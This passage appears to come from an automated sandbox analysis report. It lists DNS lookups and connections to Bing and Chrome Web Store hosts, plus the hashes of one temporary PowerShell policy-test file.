| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| IE | 74.125.193.95:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.193.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5zccit5.mku.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |